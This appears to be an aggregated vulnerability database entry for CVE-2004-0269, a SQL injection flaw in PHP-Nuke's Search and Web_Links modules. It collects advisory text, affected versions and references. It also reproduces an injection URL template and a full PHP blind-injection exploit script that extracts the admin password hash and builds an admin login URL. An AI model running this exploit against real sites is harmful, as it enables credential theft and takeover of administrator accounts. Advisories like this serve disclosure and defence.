CVE-2004-0269
CVSS 6.4
Published: 2004-11-23 00:00:00
Last modified: 2016-10-17 22:42:48

[Original] SQL injection vulnerability in PHP-Nuke 6.9 and earlier, and possibly 7.x, allows remote attackers to inject arbitrary SQL code and gain sensitive information via (1) the category variable in the Search module or (2) the admin variable in the Web_Links module.


[CNNVD] PHP-Nuke Category Parameter SQL Injection Vulnerability (CNNVD-200411-123)

        
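        PHP-Nuke is a widely used website creation and management tool that can use many database systems as its back end, such as MySQL, PostgreSQL, mSQL, Interbase and Sybase.
        The 'index.php' script included in PHP-Nuke does not sufficiently filter user-submitted parameters. A remote attacker can exploit this to carry out SQL injection attacks, potentially obtaining sensitive database information and modifying database contents.
        When a search is performed, the index.php script does not sufficiently filter the data submitted to the $category variable. Submitting data that contains SQL commands as the $category parameter can alter the original database logic, exposing sensitive database information and allowing database contents to be modified.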
        

- CVSS (Base Score)

CVSS score: 6.4 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)

cpe:/a:francisco_burzi:php-nuke:5.4
cpe:/a:francisco_burzi:php-nuke:5.1
cpe:/a:francisco_burzi:php-nuke:6.0
cpe:/a:francisco_burzi:php-nuke:2.5
cpe:/a:francisco_burzi:php-nuke:4.3
cpe:/a:francisco_burzi:php-nuke:5.2
cpe:/a:francisco_burzi:php-nuke:6.6
cpe:/a:francisco_burzi:php-nuke:5.0
cpe:/a:francisco_burzi:php-nuke:3.0
cpe:/a:francisco_burzi:php-nuke:6.5_rc1
cpe:/a:francisco_burzi:php-nuke:4.4
cpe:/a:francisco_burzi:php-nuke:5.0.1
cpe:/a:francisco_burzi:php-nuke:1.0
cpe:/a:francisco_burzi:php-nuke:4.4.1a
cpe:/a:francisco_burzi:php-nuke:5.2a
cpe:/a:francisco_burzi:php-nuke:4.0
cpe:/a:francisco_burzi:php-nuke:6.5_rc2
cpe:/a:francisco_burzi:php-nuke:6.5_beta1
cpe:/a:francisco_burzi:php-nuke:6.7
cpe:/a:francisco_burzi:php-nuke:5.5
cpe:/a:francisco_burzi:php-nuke:5.3.1
cpe:/a:francisco_burzi:php-nuke:5.6
cpe:/a:francisco_burzi:php-nuke:6.5
cpe:/a:francisco_burzi:php-nuke:6.5_final
cpe:/a:francisco_burzi:php-nuke:6.9
cpe:/a:francisco_burzi:php-nuke:6.5_rc3

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0269
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0269
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-123
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=107643348117646&w=2
(UNKNOWN)  BUGTRAQ  20040210 [SCAN Associates Sdn Bhd Security Advisory] PHPNuke 6.9 > and below SQL Injection in multiple module
http://www.scan-associates.net/papers/phpnuke69.txt
(UNKNOWN)  MISC  http://www.scan-associates.net/papers/phpnuke69.txt
http://www.securityfocus.com/bid/9630
(VENDOR_ADVISORY)  BID  9630
http://xforce.iss.net/xforce/xfdb/15115
(VENDOR_ADVISORY)  XF  phpnuke-modules-sql-injection(15115)

- Vulnerability Information

PHP-Nuke Category Parameter SQL Injection Vulnerability
Medium severity  Input validation
2004-11-23 00:00:00 2005-10-20 00:00:00
Remote
        
        

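- Advisories and Patches

        Vendor patch:
        Francisco Burzi
        ---------------
        The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version: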
        
        http://www.phpnuke.org

- Vulnerability Information (22589)

PHPNuke 5.x/6.x Web_Links Module Remote SQL Injection Vulnerability (EDBID:22589)
php webapps
2003-05-12 Verified
0 Albert Puigsech Galicia
N/A
source: http://www.securityfocus.com/bid/7558/info

It has been reported that multiple input validation bugs exist in the Web_Links module used by PHPNuke. Because of this, a remote user may be able to access the database and potentially gain access to sensitive information. Successful exploitation could result in compromise of the web forums or more severe consequences. 

http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>

where <our_code> represents attacker-supplied SQL code. 		

- Vulnerability Information (23680)

PHPNuke 6.x Category Parameter SQL Injection Vulnerability (EDBID:23680)
php webapps
2003-12-23 Verified
0 pokleyzz
N/A
source: http://www.securityfocus.com/bid/9630/info

It has been reported that PHPNuke may be prone to a SQL injection vulnerability due to insufficient sanitization of user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page.

PHPNuke versions 6.9 and prior have been reported to be prone to this issue; however, other versions may be affected as well.

#!/usr/bin/php -q
PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>

<?php
/*
# PHPnuke 6.x and 5.x fetch author hash by pokleyzz <pokleyzz at scan-associates.net>
# 27th December 2003 : 4:54 a.m
#
# bug found by pokleyzz (11th December 2003 ) for HITB 2003 security conference
# (Shame on You!!) 
#
# Requirement:
#	PHP 4.x with curl extension;
#
# Greet: 
#	tynon, sk ,wanvadder,  sir_flyguy, wxyz , tenukboncit, kerengga_kurus , 
#	s0cket370 , b0iler and ...
#
# Happy new year 2004 ...
#
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1):
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#
# Tribute to Search - "kejoraku bersatu.mp3"
#
*/
if (!(function_exists('curl_init'))) {
	echo "cURL extension required\n";
	exit;
}

ini_set("max_execution_time","999999");
 
$matches = "No matches found to your query";

//$url = "http://127.0.0.1/src/phpnuke441a/html";
$charmap = array (48,49,50,51,52,53,54,55,56,57,
		  97,98,99,100,101,102,
		  103,104,105,
		  106,107,108,109,110,111,112,113,
		  114,115,116,117,118,119,120,121,122
		  );
		  
if($argv[1] && $argv[2]){
	
	$url = $argv[1];
	$author = $argv[2];
	if ($argv[3])
		$proxy = $argv[3]; 
}
else {
	echo "Usage: ".$argv[0]." <URL> <aid> [proxy]\n\n";
	echo "\tURL\t URL to phpnuke site (ex: http://127.0.0.1/html)\n";
	echo "\taid\t author id to get  (ex: god)\n";
	echo "\tproxy\t optional proxy url  (ex: http://10.10.10.10:8080)\n"; 
	exit;
}
$search = "/modules.php?name=Search";
echo "Take your time for Teh Tarik... please wait ...\n\n";
echo "Result:\n";
echo "\t$author:";
$admin = $author.":";
$i =0;
$tmp = "char(";
while ($i < strlen($author)){
	$tmp .= ord(substr($author,$i,1));
	$i++;
	if ($i < strlen($author)){
		$tmp .= ",";
	} 
}
$tmp .= ")";
$author=$tmp;

for($i= 1;$i< 33;$i++){ 
	foreach ($charmap as $char){
		echo chr($char);
		$postvar = "query=%25&category=99999+or+a.aid=$author+and+ascii(substring(a.pwd,$i,1))=$char";
		$ch = curl_init();
		if ($proxy){
			curl_setopt($ch, CURLOPT_PROXY,$proxy); 
		}
		curl_setopt($ch, CURLOPT_URL,$url.$search);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
		curl_setopt($ch, CURLOPT_POST, 1);
		curl_setopt($ch, CURLOPT_POSTFIELDS, $postvar);
		$res=curl_exec ($ch);
		curl_close ($ch);
		if (!(ereg($matches,$res))){
			//echo chr($char);
			$admin .= chr($char);
			break 1;
		}
		else {
			echo chr(8);
		}
		
		if ($char ==103){
			echo "\n\n\tNot Vulnerable or Something wrong occur ...\n";
			exit;
		}
		
	}
}
$admin .= "::";
echo "\n\nAdmin URL:\n";
echo "\t$url/admin.php?admin=".ereg_replace("=","%3d",base64_encode($admin));
echo "\n";
echo "\n\nEnjoy your self and Happy New Year 2004....";
?>
		

- Vulnerability Information

3929
PHP-Nuke Web_Links Module admin Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability Description

PHP-Nuke contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the $admin variable in the Web_Links module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- Timeline

2004-02-10 2004-12-27
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

PHPNuke Category Parameter SQL Injection Vulnerability
Input Validation Error 9630
Yes No
2004-02-10 12:00:00 2009-07-12 02:06:00
The disclosure of this issue has been credited to pokleyzz <pokleyzz_at_scan-associates.net>.

- Affected Software Versions

Francisco Burzi PHP-Nuke 6.9
Francisco Burzi PHP-Nuke 6.7
Francisco Burzi PHP-Nuke 6.6
Francisco Burzi PHP-Nuke 6.5 RC3
Francisco Burzi PHP-Nuke 6.5 RC2
Francisco Burzi PHP-Nuke 6.5 RC1
Francisco Burzi PHP-Nuke 6.5 FINAL
Francisco Burzi PHP-Nuke 6.5 BETA 1
Francisco Burzi PHP-Nuke 6.5
Francisco Burzi PHP-Nuke 6.0
Francisco Burzi PHP-Nuke 5.6
Francisco Burzi PHP-Nuke 5.5
Francisco Burzi PHP-Nuke 5.4
Francisco Burzi PHP-Nuke 5.3.1
Francisco Burzi PHP-Nuke 5.2 a
Francisco Burzi PHP-Nuke 5.2
Francisco Burzi PHP-Nuke 5.1
Francisco Burzi PHP-Nuke 5.0.1
Francisco Burzi PHP-Nuke 5.0
Francisco Burzi PHP-Nuke 4.4.1 a
Francisco Burzi PHP-Nuke 4.4
Francisco Burzi PHP-Nuke 4.3
Francisco Burzi PHP-Nuke 4.0
Francisco Burzi PHP-Nuke 3.0
- Linux kernel 2.2
Francisco Burzi PHP-Nuke 2.5
Francisco Burzi PHP-Nuke 1.0

- Discussion

It has been reported that PHPNuke may be prone to a SQL injection vulnerability due to insufficient sanitization of user-supplied input. The problem is reported to exist in the $category variable contained within the 'index.php' page.

PHPNuke versions 6.9 and prior have been reported to be prone to this issue; however, other versions may be affected as well.

- Exploit

The following exploit has been provided:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related References

 

 
